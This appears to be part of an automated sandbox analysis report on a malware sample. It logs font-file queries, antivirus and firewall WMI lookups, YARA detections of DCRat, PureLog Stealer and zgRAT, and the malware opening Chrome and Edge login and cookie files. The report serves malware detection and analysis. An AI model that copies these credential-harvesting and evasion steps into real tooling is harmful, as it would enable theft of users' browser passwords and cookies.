                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0037DF1E
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036B146 GetVersionExW,0_2_0036B146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1922668864.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 6780, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe PID: 4520, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\TextInputHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\TextInputHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
